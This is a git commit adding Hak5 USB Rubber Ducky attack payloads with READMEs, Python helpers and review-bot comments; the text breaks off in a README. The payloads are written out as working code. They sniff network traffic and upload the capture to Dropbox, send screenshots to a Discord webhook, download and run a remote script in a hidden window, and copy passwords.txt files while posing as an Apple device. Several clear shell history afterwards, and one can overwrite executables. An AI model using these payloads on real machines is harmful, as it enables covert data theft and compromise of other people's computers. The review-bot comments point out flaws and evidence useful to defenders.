Merge branch 'hak5:master' into master
commit
1f42c9777b
|
@ -0,0 +1,32 @@
|
|||
# Exploiting An Executable File - Linux ✅
|
||||
|
||||
Plug-And-Play ❤️
|
||||
|
||||
A script used to detect all executable files in a Linux system. An executable file can be used in cybersecurity to execute some script without having the necessary permissions to make it executable.
|
||||
|
||||
**Category**: Execution
|
||||
|
||||
## Description
|
||||
|
||||
A script used to detect all executable files in a Linux system. An executable file can be used in cybersecurity to execute some script without having the necessary permissions to make it executable.
|
||||
|
||||
**Remember that any execution that is not permitted is not legitimate**.
|
||||
|
||||
## Getting Started
|
||||
|
||||
### Dependencies
|
||||
|
||||
* Linux system
|
||||
|
||||
### Executing program
|
||||
|
||||
* Plug in your device
|
||||
|
||||
### Settings
|
||||
|
||||
* You can edit the content that you want to put into the executable file.
|
||||
|
||||
```Shell
|
||||
# You can put whatever you want into the executable file
|
||||
echo "/bin/sh" > "$file"
|
||||
```
|
|
@ -0,0 +1,40 @@
|
|||
|
||||
REM ################################################
|
||||
REM # |
|
||||
REM # Title : Exploiting An Executable File |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Execution |
|
||||
REM # Target : Linux |
|
||||
REM # |
|
||||
REM ################################################
|
||||
|
||||
REM Requirements:
|
||||
REM - Nothing, it is Plug-And-Play but you can change it as you want.
|
||||
|
||||
DELAY 1000
|
||||
CTRL-ALT t
|
||||
DELAY 2000
|
||||
|
||||
|
||||
REM #### Script ####
|
||||
|
||||
|
||||
STRINGLN
|
||||
function search_file {
|
||||
for file in "$1"/*; do
|
||||
if [[ -d "$file" ]]; then
|
||||
search_file "$file";
|
||||
elif [[ -f "$file" && -r "$file" && -w "$file" && -x "$file" ]]; then
|
||||
echo "File Found: $file";
|
||||
# You can put whatever you want into the executable file
|
||||
# echo "/bin/sh" > "$file"
|
||||
fi
|
||||
done
|
||||
}
|
||||
USER=$(whoami);
|
||||
# You can choose whatever folder you want, the script is recursive.
|
||||
DIR=/home/$USER/Documents;
|
||||
search_file "$DIR";
|
||||
END_STRING
|
||||
ENTER
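Review bot: The commented-out `# echo "/bin/sh" > "$file"` inside `search_file` is described only as "You can put whatever you want into the executable file", which hides that enabling it truncates and replaces every file the loop matches under `$DIR`, recursively and with no backup. The README added in this commit shows the same line uncommented, so a reader copying from there gets the destructive form. I would reword the comment to `# Destructive if enabled: overwrites every matched file under $DIR; leave commented to only list them` and show the line commented in the README as well. The script.sh added next to this payload carries the same two lines.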
|
|
@ -0,0 +1,19 @@
|
|||
#!/bin/bash
|
||||
|
||||
function search_file {
|
||||
for file in "$1"/*; do
|
||||
if [[ -d "$file" ]]; then
|
||||
search_file "$file"
|
||||
elif [[ -f "$file" && -r "$file" && -w "$file" && -x "$file" ]]; then
|
||||
echo "File Found: $file"
|
||||
# You can put whatever you want into the executable file
|
||||
# echo "/bin/sh" > "$file"
|
||||
fi
|
||||
done
|
||||
}
|
||||
|
||||
USER=$(whoami)
|
||||
|
||||
# You can choose whatever folder you want, the script is recursive.
|
||||
DIR=/home/$USER/Documents
|
||||
search_file "$DIR"
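Review bot: `search_file` recurses into anything that passes `[[ -d "$file" ]]`, and that test follows symbolic links, so a link pointing back to a parent directory keeps the recursion going until the shell gives up. Skipping links in the directory branch avoids it: `if [[ -d "$file" && ! -L "$file" ]]; then`. Separately, `USER=$(whoami)` overwrites the shell's own `USER` variable, and `/home/$USER/Documents` assumes the home directory lives under `/home`; `DIR="$HOME/Documents"` covers both. The payload.txt in this commit types the same function and has the same issues.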
|
|
@ -0,0 +1,27 @@
|
|||
# Set Arbitrary VPN - Linux ✅
|
||||
|
||||
A script used to set an arbitrary VPN on a Linux machine.
|
||||
|
||||
**Category**: Execution
|
||||
|
||||
## Description
|
||||
|
||||
A script used to set an arbitrary VPN on a Linux machine.
|
||||
|
||||
Opens a shell, download the vpn file, set the vpn through openvpn, erase traces.
|
||||
|
||||
## Getting Started
|
||||
|
||||
### Dependencies
|
||||
|
||||
* Permissions
|
||||
* Internet Connection
|
||||
* 'openvpn' installed
|
||||
|
||||
### Executing program
|
||||
|
||||
* Plug in your device
|
||||
|
||||
### Settings
|
||||
|
||||
* Set the VPN file link
|
|
@ -0,0 +1,71 @@
|
|||
|
||||
REM ####################################
|
||||
REM # |
|
||||
REM # Title : Set Arbitrary VPN |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Execution |
|
||||
REM # Target : Linux |
|
||||
REM # |
|
||||
REM ####################################
|
||||
|
||||
REM Requirements:
|
||||
REM - Permissions
|
||||
REM - Internet Connection
|
||||
REM - 'openvpn' installed
|
||||
|
||||
REM REQUIRED: You need to know the sudo password and replace 'example' with this
|
||||
DEFINE SUDO_PASS example
|
||||
REM REQUIRED: Set your VPN file configuration replacing example.com with your own link
|
||||
DEFINE VPN_FILE_LINK example.com
|
||||
|
||||
DELAY 1000
|
||||
CTRL-ALT t
|
||||
DELAY 2000
|
||||
|
||||
|
||||
REM #### PERMISSIONS SECTION ####
|
||||
|
||||
|
||||
STRING sudo su
|
||||
ENTER
|
||||
DELAY 1000
|
||||
STRING SUDO_PASS
|
||||
ENTER
|
||||
DELAY 1000
|
||||
|
||||
|
||||
REM #### VPN SECTION ####
|
||||
|
||||
|
||||
STRING curl
|
||||
STRING VPN_FILE_LINK
|
||||
STRING > vpn_configuration.ovpn
|
||||
ENTER
|
||||
REM It depends by the internet connection
|
||||
DELAY 2000
|
||||
|
||||
STRING openvpn vpn_configuration.ovpn
|
||||
REM It depends by the computer power
|
||||
DELAY 2000
|
||||
|
||||
|
||||
REM #### REMOVE TRACES ####
|
||||
|
||||
|
||||
STRING rm vpn_configuration.ovpn
|
||||
ENTER
|
||||
DELAY 500
|
||||
|
||||
STRING history -c
|
||||
ENTER
|
||||
DELAY 500
|
||||
|
||||
REM Exit from Sudo user
|
||||
STRING exit
|
||||
ENTER
|
||||
DELAY 500
|
||||
|
||||
REM Close the shell
|
||||
STRING exit
|
||||
ENTER
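Review bot: `DEFINE SUDO_PASS` keeps the account's sudo password in clear text in the payload file on the device, and `STRING SUDO_PASS` types it after a fixed `DELAY 1000` whether or not a password prompt is actually waiting. If sudo does not prompt (cached credentials) or the prompt is slow, the password is entered as an ordinary shell command, so it is echoed in the terminal and can end up in the shell history file. The header should say so, for example `REM SUDO_PASS is stored and typed in clear text; if no prompt is open it lands in the terminal and shell history - change the password after the test`. The Exfiltrate Network Traffic payload in this commit uses the same `DEFINE SUDO_PASS` / `STRINGLN SUDO_PASS` sequence.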
|
|
@ -0,0 +1,29 @@
|
|||
# Exfiltrate Computer Screenshots
|
||||
|
||||
A script used to prank your friends exfiltrating some screenshots.
|
||||
|
||||
**Category**: Exfiltration
|
||||
|
||||
## Description
|
||||
|
||||
A script used to prank your friends exfiltrating some screenshots.
|
||||
|
||||
Open a PowerShell, download the Python script and execute it. The Python script will make some screenshot that will be sent, through the discord webhook, to you.
|
||||
|
||||
## Getting Started
|
||||
|
||||
### Dependencies
|
||||
|
||||
* Internet Connection
|
||||
* Discord Webhook (or whatever you want for the exfiltration)
|
||||
* ExecutionPolicy Bypass
|
||||
* Python
|
||||
|
||||
### Executing program
|
||||
|
||||
* Plug in your device
|
||||
|
||||
### Settings
|
||||
|
||||
- Setup your Python script link in the payload.txt file
|
||||
- Setup your Discord webhook link in the script.py file
|
|
@ -0,0 +1,39 @@
|
|||
REM ###################################################
|
||||
REM # |
|
||||
REM # Title : Exfiltrate Computer Screenshots |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Exfiltrate |
|
||||
REM # Target : Windows 10-11 |
|
||||
REM # |
|
||||
REM ###################################################
|
||||
|
||||
|
||||
REM Requirements:
|
||||
REM - Internet Connection
|
||||
REM - Discord Webhook (or whatever you want for the exfiltration)
|
||||
REM - ExecutionPolicy Bypass
|
||||
REM - Python
|
||||
|
||||
|
||||
REM REQUIRED - Set your Python script link
|
||||
DEFINE SCRIPT-PY-LINK example.com
|
||||
|
||||
|
||||
DELAY 1000
|
||||
GUI r
|
||||
DELAY 1000
|
||||
STRING powershell
|
||||
ENTER
|
||||
DELAY 2000
|
||||
|
||||
|
||||
STRING Invoke-WebRequest -Uri "
|
||||
STRING SCRIPT-PY-LINK
|
||||
STRING " -OutFile "script.py"
|
||||
ENTER
|
||||
DELAY 2000
|
||||
|
||||
STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
|
||||
DELAY 1000
|
||||
ALT F4
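Review bot: The file fetched by `Invoke-WebRequest` is handed straight to `python.exe` with nothing checking that it is the script the author intended, and `DEFINE SCRIPT-PY-LINK example.com` does not even require HTTPS. Whoever controls that link or the network path decides what runs on the machine under test. I would document the constraint next to the define, e.g. `REM SCRIPT-PY-LINK must be an https:// URL you control; the download is executed as-is, with no hash check`, or compare `(Get-FileHash script.py).Hash` with a known value before the `Start-Process` line. The Change Wallpaper With Screenshot payload in this commit has the same download-and-run sequence. For anyone reviewing logs, the visible chain is PowerShell started from the Run dialog, an outbound web request, then a hidden-window `python.exe`.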
|
|
@ -0,0 +1,34 @@
|
|||
import pyautogui
|
||||
from time import sleep
|
||||
import requests
|
||||
|
||||
|
||||
# YOUR DISCORD WEBHOOK
|
||||
discord_webhook = "https://discord.com/api/webhooks/123456789/xxxxxxxxxx"
|
||||
|
||||
# Edit this variables as you want
|
||||
SCREENSHOTS = 10
|
||||
TIMING = 5
|
||||
|
||||
for i in range(SCREENSHOTS):
|
||||
sleep(TIMING)
|
||||
|
||||
# take the screenshot
|
||||
screenshot = pyautogui.screenshot()
|
||||
screenshot.save("screenshot.png")
|
||||
|
||||
with open("screenshot.png", "rb") as f:
|
||||
foto = f.read()
|
||||
|
||||
richiesta = {
|
||||
"username": "ExfiltrateComputerScreenshot"
|
||||
}
|
||||
|
||||
# Send the message by attaching the photo
|
||||
response = requests.post(discord_webhook, data=richiesta, files={"Screen#"+str(i)+".png": foto})
|
||||
|
||||
# Useful for debugging
|
||||
# if response.status_code == 200:
|
||||
# print("Photo successfully sent!")
|
||||
# else:
|
||||
# print("Error while submitting photo." + str(response.status_code))
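Review bot: `discord_webhook` is a bearer credential written in clear text into a file that the payload downloads to the host and leaves there together with `screenshot.png`, so anyone who later reads script.py, or the link it was served from, can use the webhook. The comment `# YOUR DISCORD WEBHOOK` should say that, e.g. `# Webhook URL is a secret; it stays readable in script.py on the host - delete the webhook after the test`. For responders, the URL in that file identifies where the images were sent.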
|
|
@ -0,0 +1,27 @@
|
|||
# Exfiltrate Network Traffic - Linux ✅
|
||||
|
||||
A script used to exfiltrate the network traffic on a Linux machine.
|
||||
|
||||
**Category**: Exfiltrate
|
||||
|
||||
## Description
|
||||
|
||||
A script used to exfiltrate the network traffic on a Linux machine.
|
||||
|
||||
Opens a shell, get the network card name, get the network traffic using tcpdump, send the result to Dropbox, erase traces.
|
||||
|
||||
## Getting Started
|
||||
|
||||
### Dependencies
|
||||
|
||||
* Permissions
|
||||
* Internet Connection
|
||||
|
||||
### Executing program
|
||||
|
||||
* Plug in your device
|
||||
|
||||
### Settings
|
||||
|
||||
* Set the Dropbox token
|
||||
* Set the sniffing filter
|
|
@ -0,0 +1,107 @@
|
|||
|
||||
REM #############################################
|
||||
REM # |
|
||||
REM # Title : Exfiltrate Network Traffic |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Exfiltration |
|
||||
REM # Target : Linux |
|
||||
REM # |
|
||||
REM #############################################
|
||||
|
||||
REM Requirements:
|
||||
REM - Permissions
|
||||
REM - Internet Connection
|
||||
|
||||
REM REQUIRED: You need to know the sudo password and replace 'example' with this
|
||||
DEFINE SUDO_PASS example
|
||||
REM REQUIRED: Set what you want to sniff, for example tcp port 80
|
||||
DEFINE SNIFFING example
|
||||
REM Set your Dropbox link or whatever you want to use to exfiltrate the sniff file
|
||||
DEFINE TOKEN example
|
||||
REM Just a Dropbox const
|
||||
DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
|
||||
REM Output file path packets.pcap, remember to use pcap extension
|
||||
DEFINE FILE example.pcap
|
||||
|
||||
|
||||
DELAY 1000
|
||||
CTRL-ALT t
|
||||
DELAY 2000
|
||||
|
||||
|
||||
REM #### PERMISSIONS SECTION ####
|
||||
|
||||
|
||||
STRINGLN sudo su
|
||||
DELAY 1000
|
||||
STRINGLN SUDO_PASS
|
||||
DELAY 1000
|
||||
|
||||
|
||||
REM #### Network Traffic SECTION ####
|
||||
|
||||
|
||||
STRING FILE_PATH="
|
||||
STRING FILE
|
||||
STRING "
|
||||
ENTER
|
||||
DELAY 500
|
||||
|
||||
STRING filter_expression="
|
||||
STRING SNIFFING
|
||||
STRING "
|
||||
ENTER
|
||||
DELAY 500
|
||||
|
||||
REM Network card name
|
||||
STRINGLN net_card="$(ip route get 8.8.8.8 | awk '{ print $5; exit }')"
|
||||
DELAY 500
|
||||
|
||||
REM Network dump
|
||||
STRINGLN tcpdump -i "$net_card" $filter_expression -w "$FILE_PATH" &
|
||||
DELAY 500
|
||||
|
||||
REM Get PID
|
||||
STRINGLN tcpdump_pid=$!
|
||||
|
||||
REM Set how long you want to sniff
|
||||
DELAY 60000
|
||||
|
||||
REM Kill the process by PID
|
||||
STRINGLN kill $tcpdump_pid
|
||||
|
||||
|
||||
REM #### Exfiltrate SECTION ####
|
||||
REM You can use whatever you want, i use Dropbox
|
||||
|
||||
STRING ACCESS_TOKEN="
|
||||
STRING TOKEN
|
||||
STRING "
|
||||
ENTER
|
||||
DELAY 500
|
||||
|
||||
STRINGLN DROPBOX_FOLDER="/Exfiltration"
|
||||
DELAY 500
|
||||
|
||||
STRING curl -X POST
|
||||
STRING DROPBOX_API_CONST
|
||||
STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$FILE_PATH"
|
||||
ENTER
|
||||
|
||||
|
||||
REM #### REMOVE TRACES ####
|
||||
|
||||
|
||||
STRINGLN rm "$FILE_PATH"
|
||||
DELAY 500
|
||||
|
||||
STRINGLN history -c
|
||||
DELAY 500
|
||||
|
||||
REM Exit from Sudo user
|
||||
STRINGLN exit
|
||||
DELAY 500
|
||||
|
||||
REM Close the shell
|
||||
STRINGLN exit
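Review bot: The `REM #### REMOVE TRACES ####` heading promises more than the commands under it do: `rm "$FILE_PATH"` deletes the capture file and `history -c` clears only the in-memory history of the root shell that is about to exit. The sudo session, tcpdump putting the interface into promiscuous mode, and the upload to the Dropbox endpoint are recorded elsewhere (auth log or journal, kernel log, network monitoring) and are untouched. I would rename the block to describe what it does, `REM #### CLEANUP: capture file and shell history only ####`. The Set Arbitrary VPN payload in this commit carries the same heading.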
|
|
@ -0,0 +1,12 @@
|
|||
#!/bin/bash
|
||||
|
||||
filter_expression="tcp port 80"
|
||||
|
||||
net_card="$(ip route get 8.8.8.8 | awk '{ print $5; exit }')"
|
||||
|
||||
tcpdump -i "$net_card" $filter_expression -w packets.pcap &
|
||||
tcpdump_pid=$!
|
||||
|
||||
sleep 60
|
||||
|
||||
kill $tcpdump_pid
|
|
@ -0,0 +1,47 @@
|
|||
# Exfiltrate Files Through GUI - MacOS
|
||||
|
||||
Copies files with a certain name to ducky
|
||||
|
||||
**Category**: Exfiltration
|
||||
|
||||
## Description
|
||||
|
||||
A script used to open the finder, look for files with a certain name, then copy them all onto the Ducky
|
||||
|
||||
## Getting Started
|
||||
|
||||
### Dependencies
|
||||
|
||||
* None (That is the beauty of it)
|
||||
|
||||
### Executing program
|
||||
|
||||
* Plug in your device
|
||||
|
||||
### Settings
|
||||
|
||||
* Here you can define what files you want the ducky to look for. Note that the more matches there are the longer it will take to copy.
|
||||
|
||||
```DuckyScript
|
||||
DEFINE #target the_filename_you_want.txt
|
||||
```
|
||||
|
||||
* The main `DELAY` points in this script are before tabing 4 times to access the `DUCKY` USB as it is very random how long it takes (in my testing on an m1 pro 3-6 seconds) to show up and the one after the `COMMMAND v` which has to be adjusted depening on how generic the file name looked for it.
|
||||
|
||||
Delay for USB to show up:
|
||||
```DuckyScript
|
||||
REM This can take annoyingly long to show up which is why the delay is so big
|
||||
DELAY 6000
|
||||
|
||||
REM Go to first result
|
||||
DO_TABS()
|
||||
```
|
||||
|
||||
Delay for how long the file copying takes:
|
||||
```DuckyScript
|
||||
REM Paste the copied files. As this may take a few seconds given on how many results there were there is a long delay
|
||||
COMMAND v
|
||||
DELAY 7000
|
||||
```
|
||||
|
||||
https://user-images.githubusercontent.com/69253692/230636177-ca9c5931-44ee-43a2-addc-4ee7f7fb0d62.mov
|
|
@ -0,0 +1,95 @@
|
|||
REM ###################################################
|
||||
REM # |
|
||||
REM # Title : Exfiltrate Files through GUI mac |
|
||||
REM # Author : Kile |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Exfiltration |
|
||||
REM # Target : MacOS |
|
||||
REM # |
|
||||
REM ###################################################
|
||||
|
||||
REM NOTE This is not unlikely to fail depending on the speed of search or if a large amount of files meet the criteria. Adjust DELAYs to your needs
|
||||
|
||||
ATTACKMODE STORAGE HID VID_05AC PID_021E
|
||||
DELAY 2000
|
||||
|
||||
REM the filename for the payload to look for
|
||||
DEFINE #target passwords.txt
|
||||
|
||||
REM Given that it uses the GUI it is a good idea to enable jitter to be less suspicious
|
||||
$_JITTER_ENABLED = TRUE
|
||||
|
||||
REM This function tabs the amount of times it takes from a finder search to go onto the first file result (4)
|
||||
FUNCTION DO_TABS()
|
||||
VAR $COUNTER = 0
|
||||
WHILE ($COUNTER < 4)
|
||||
TAB
|
||||
DELAY 100
|
||||
$COUNTER = ($COUNTER + 1)
|
||||
END_WHILE
|
||||
END_FUNCTION
|
||||
|
||||
REM Open finder
|
||||
COMMAND SPACE
|
||||
STRINGLN finder
|
||||
DELAY 500
|
||||
REM Command n spawns a new window. This makes sure there is only one finder tab (for tabbing to the files later)
|
||||
COMMAND n
|
||||
|
||||
REM Open search bar in finder
|
||||
COMMAND f
|
||||
DELAY 200
|
||||
REM type target filename
|
||||
STRING #target
|
||||
DELAY 200
|
||||
REM This specifies that the passwords.txt has to be a filename and not be in any file
|
||||
DOWN
|
||||
ENTER
|
||||
ENTER
|
||||
|
||||
REM Give a bit to find all files
|
||||
DELAY 500
|
||||
REM now 4 tabs to get to the first file result
|
||||
DO_TABS()
|
||||
|
||||
REM select all files that have the specified target in their name
|
||||
COMMAND a
|
||||
REM Copy the files
|
||||
COMMAND c
|
||||
DELAY 500
|
||||
REM Go back to search window
|
||||
COMMAND f
|
||||
DELAY 200
|
||||
REM Delete previous search
|
||||
DEL
|
||||
|
||||
REM Search for DUCKY USB
|
||||
STRING DUCKY
|
||||
DELAY 200
|
||||
DOWN
|
||||
ENTER
|
||||
REM Specifies that the "DUCKY" has to be an external USB drive
|
||||
STRING Volume
|
||||
DELAY 200
|
||||
DOWN
|
||||
DOWN
|
||||
DOWN
|
||||
ENTER
|
||||
ENTER
|
||||
REM This can take annoyingly long to show up which is why the delay is so big
|
||||
DELAY 6000
|
||||
|
||||
REM Go to first result
|
||||
DO_TABS()
|
||||
|
||||
REM Open the drive
|
||||
COMMAND o
|
||||
DELAY 1000
|
||||
REM This takes a few seconds
|
||||
|
||||
REM Paste the copied files. As this may take a few seconds given on how many results there were there is a long delay
|
||||
COMMAND v
|
||||
DELAY 7000
|
||||
|
||||
REM Hide
|
||||
ATTACKMODE OFF
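Review bot: `ATTACKMODE STORAGE HID VID_05AC PID_021E` near the top of the payload uses bare vendor and product IDs with no comment, so a reader cannot tell that the device will enumerate under Apple's USB vendor ID (05AC) rather than its own. Add a line above it such as `REM VID_05AC is Apple's USB vendor ID; the host sees an Apple-branded HID device`. That also tells defenders what to look for: a device claiming Apple keyboard IDs that exposes a mass-storage interface at the same time. The Set VSCode to light theme payload in this commit uses the same IDs without explanation.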
|
|
@ -0,0 +1,32 @@
|
|||
# Alien Message From Computer
|
||||
|
||||
A script used to prank your friends with a script that simulate an Alien inside the computer.
|
||||
|
||||
**Category**: Prank
|
||||
|
||||
## Description
|
||||
|
||||
A script used to prank your friends with a script that simulate an Alien inside the computer.
|
||||
|
||||
Open a PowerShell, download the Python script and execute it. The Python script will simulate the Alien using the Python library pyttsx3.
|
||||
|
||||
## Getting Started
|
||||
|
||||
### Dependencies
|
||||
|
||||
* Internet Connection
|
||||
* ExecutionPolicy Bypass
|
||||
* Python
|
||||
|
||||
### Executing program
|
||||
|
||||
* Plug in your device
|
||||
|
||||
### Settings
|
||||
|
||||
* Nothing to setup, it is Plug-And-Play
|
||||
|
||||
### FAQs
|
||||
|
||||
- Why is the code in one line?
|
||||
- In Python if TAB errors are made then execution is blocked so to avoid writing so many DuckyScript STRING elements I wrote everything in one line separating each command by a semicolon. However, the code can be viewed entirely in the script.py file and edited as desired.
|
|
@ -0,0 +1,40 @@
|
|||
|
||||
REM ####################################################
|
||||
REM # |
|
||||
REM # Title : Alien Message From Computer |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Prank |
|
||||
REM # Target : Windows 10/11 |
|
||||
REM # |
|
||||
REM ####################################################
|
||||
|
||||
|
||||
REM Plug-And-Play <3
|
||||
|
||||
REM Requirements:
|
||||
REM - Internet Connection
|
||||
REM - ExecutionPolicy Bypass
|
||||
REM - Python
|
||||
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell
|
||||
ENTER
|
||||
DELAY 1500
|
||||
|
||||
REM Create the file
|
||||
STRING New-Item -Path ".\script.py" -ItemType "file" -Force
|
||||
|
||||
REM Write the code into the file
|
||||
STRING Set-Content -Path ".\script.py" -Value "import os; from time import sleep; os.system('pip install pyttsx3'); import pyttsx3; sleep(60); alien_message = 'Greetings to the inhabitants of planet Earth. I am an alien from a distant planet named Hak5 and I have taken control of this computer to communicate with you. I want to announce to you that in exactly one year\'s time our invasion fleet will arrive on your planet because we have heard that you make very good fries. Resistance is useless. Your only option is to give us all the fries you have and to produce as many as possible to satiate us. Your planet will become a potato chip colony and you will produce forever. Get ready, earthlings. Our hunger is near.'; motore = pyttsx3.init(); voce_alienea = motore.getProperty('voices')[1]; motore.setProperty('voice', voce_alienea.id); motore.setProperty('pitch', 70); motore.say(alien_message); motore.runAndWait();"
|
||||
ENTER
|
||||
DELAY 1000
|
||||
|
||||
REM Execute the Python script
|
||||
STRING Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
|
||||
ENTER
|
||||
|
||||
REM Close the PowerShell
|
||||
DELAY 1000
|
||||
ALT F4
|
|
@ -0,0 +1,25 @@
|
|||
import os
|
||||
from time import sleep
|
||||
try:
|
||||
import pyttsx3
|
||||
except:
|
||||
os.system("pip install pyttsx3")
|
||||
import pyttsx3
|
||||
|
||||
|
||||
# How much time you want to wait before speak
|
||||
sleep(60)
|
||||
|
||||
alien_message = 'Greetings to the inhabitants of planet Earth. I am an alien from a distant planet named Hak5 and I have taken control of this computer to communicate with you. I want to announce to you that in exactly one year\'s time our invasion fleet will arrive on your planet because we have heard that you make very good fries. Resistance is useless. Your only option is to give us all the fries you have and to produce as many as possible to satiate us. Your planet will become a potato chip colony and you will produce forever. Get ready, earthlings. Our hunger is near.'
|
||||
|
||||
motore = pyttsx3.init()
|
||||
|
||||
# Set alien voice
|
||||
voce_alienea = motore.getProperty('voices')[1]
|
||||
motore.setProperty('voice', voce_alienea.id)
|
||||
|
||||
# Set the pitch property to make the voice more alien-like
|
||||
motore.setProperty('pitch', 70)
|
||||
|
||||
motore.say(alien_message)
|
||||
motore.runAndWait()
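Review bot: The bare `except:` around `import pyttsx3` catches every exception, not only a missing module, and the fallback `os.system("pip install pyttsx3")` installs whatever version the index serves at that moment using whichever `pip` is first on PATH, which may belong to a different interpreter. Narrow it to `except ImportError:` and install with `subprocess.run([sys.executable, "-m", "pip", "install", "pyttsx3==<pinned version>"], check=True)` so the package lands in the running interpreter and is a known release. `motore.getProperty('voices')[1]` also raises IndexError on a machine with a single installed voice. The wallpaper script.py in this commit has the same try/except install block for pyautogui.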
|
|
@ -0,0 +1,23 @@
|
|||
# Change Wallpaper With Screenshot
|
||||
|
||||
A script used to prank friends by editing their wallpaper with a screenshot making them think that the computer somehow does what it wants. LOL
|
||||
|
||||
**Category**: Prank
|
||||
|
||||
## Description
|
||||
|
||||
A script used to prank friends by editing their wallpaper with a screenshot making them think that the computer somehow does what it wants.
|
||||
|
||||
Open a PowerShell, download the Python script and execute it. The Python script will make a screenshot that will be set as wallpaper on the computer where is runned.
|
||||
|
||||
## Getting Started
|
||||
|
||||
### Dependencies
|
||||
|
||||
* Internet Connection
|
||||
* ExecutionPolicy Bypass
|
||||
* Python
|
||||
|
||||
### Settings
|
||||
|
||||
- Setup your Python script link in the payload.txt file
|
|
@ -0,0 +1,38 @@
|
|||
REM ######################################################
|
||||
REM # |
|
||||
REM # Title : Change Wallpaper With Screenshot |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Prank |
|
||||
REM # Target : Windows 10-11 |
|
||||
REM # |
|
||||
REM ######################################################
|
||||
|
||||
|
||||
REM Requirements:
|
||||
REM - Internet Connection
|
||||
REM - ExecutionPolicy Bypass
|
||||
REM - Python
|
||||
|
||||
|
||||
REM REQUIRED - Set your Python script link
|
||||
DEFINE SCRIPT-PY-LINK example.com
|
||||
|
||||
|
||||
DELAY 1000
|
||||
GUI r
|
||||
DELAY 1000
|
||||
STRING powershell
|
||||
ENTER
|
||||
DELAY 2000
|
||||
|
||||
|
||||
STRING Invoke-WebRequest -Uri "
|
||||
STRING SCRIPT-PY-LINK
|
||||
STRING " -OutFile "script.py"
|
||||
ENTER
|
||||
DELAY 2000
|
||||
|
||||
STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
|
||||
DELAY 1000
|
||||
ALT F4
|
|
@ -0,0 +1,29 @@
|
|||
import os
|
||||
|
||||
try:
|
||||
import pyautogui
|
||||
except:
|
||||
os.system("pip install pyautogui")
|
||||
import pyautogui
|
||||
|
||||
from time import sleep
|
||||
|
||||
from PIL import Image
|
||||
import ctypes
|
||||
|
||||
|
||||
# Edit this time as you want...
|
||||
sleep(30)
|
||||
screenshot = pyautogui.screenshot()
|
||||
screenshot.save("screenshot.png")
|
||||
|
||||
img = Image.open('screenshot.png')
|
||||
|
||||
# Resize the screenshot as the desktop resolution
|
||||
user32 = ctypes.windll.user32
|
||||
screensize = user32.GetSystemMetrics(0), user32.GetSystemMetrics(1)
|
||||
img = img.resize(screensize)
|
||||
|
||||
# Set the new wallpaper
|
||||
image_path = os.path.abspath('screenshot.png')
|
||||
ctypes.windll.user32.SystemParametersInfoW(20, 0, image_path, 0)
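Review bot: The resized image is never written back: `img = img.resize(screensize)` only rebinds the local name, and `SystemParametersInfoW` is then given the path of the original `screenshot.png`, so the resize lines have no effect. Either save the result once `image_path` is computed, `img.resize(screensize).save(image_path)`, or drop the PIL import and the resize. The literal `20` is SPI_SETDESKWALLPAPER; a named constant or a short comment would make the call readable.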
|
|
@ -0,0 +1,27 @@
|
|||
# Play A Song Through Spotify
|
||||
|
||||
A script used to prank friends by playing songs through spotify
|
||||
|
||||
**Category**: Prank
|
||||
|
||||
## Description
|
||||
|
||||
A script used to prank friends by playing songs through Spotify. Open a PowerShell, run Spotify, do some TABs for search the song and then play it.
|
||||
|
||||
**Some times** popups of advertisements may come out and usually they will click on the search screen, if you want you can uncomment line 42 (and the 43 for a DELAY) so that the popup closes but in case the popup does not click then the rest of the script will not work because escaping it takes it out of its scope.
|
||||
|
||||
## Getting Started
|
||||
|
||||
### Dependencies
|
||||
|
||||
* Internet Connection
|
||||
* Spotify installed and user logged-in
|
||||
* ExecutionPolicy Bypass
|
||||
|
||||
### Executing program
|
||||
|
||||
* Plug in your device
|
||||
|
||||
### Settings
|
||||
|
||||
- Setup the SONG-NAME that you want to play
|
|
@ -0,0 +1,57 @@
|
|||
REM ##################################################
|
||||
REM # |
|
||||
REM # Title : Play A Song Through Spotify |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Prank |
|
||||
REM # Target : Windows 10-11 |
|
||||
REM # |
|
||||
REM ##################################################
|
||||
|
||||
|
||||
REM Requirements:
|
||||
REM - Internet Connection
|
||||
REM - Spotify installed and user logged-in
|
||||
REM - ExecutionPolicy Bypass
|
||||
|
||||
|
||||
REM REQUIRED - Set your song name
|
||||
DEFINE SONG-NAME example
|
||||
|
||||
|
||||
DELAY 1000
|
||||
GUI r
|
||||
DELAY 1000
|
||||
STRING powershell
|
||||
ENTER
|
||||
DELAY 2000
|
||||
|
||||
STRINGLN Start-Process "spotify://"
|
||||
DELAY 5000
|
||||
TAB
|
||||
DELAY 500
|
||||
TAB
|
||||
DELAY 500
|
||||
TAB
|
||||
DELAY 500
|
||||
TAB
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 500
|
||||
|
||||
REM Some times popups of advertisements may come out and usually they will click on the search screen, if you want you can uncomment line 42 so that the popup closes but in case the popup does not click then the rest of the script will not work because escaping it takes it out of its scope.
|
||||
REM ESCAPE
|
||||
REM DELAY 500
|
||||
|
||||
STRING SONG-NAME
|
||||
ENTER
|
||||
DELAY 1000
|
||||
TAB
|
||||
DELAY 500
|
||||
TAB
|
||||
DELAY 500
|
||||
TAB
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 500
|
||||
GUI m
|
|
@ -0,0 +1,24 @@
|
|||
# Send Messages In Teams
|
||||
|
||||
A script used to prank your friends sending a message through the user Teams.
|
||||
|
||||
**Category**: Prank
|
||||
|
||||
## Description
|
||||
|
||||
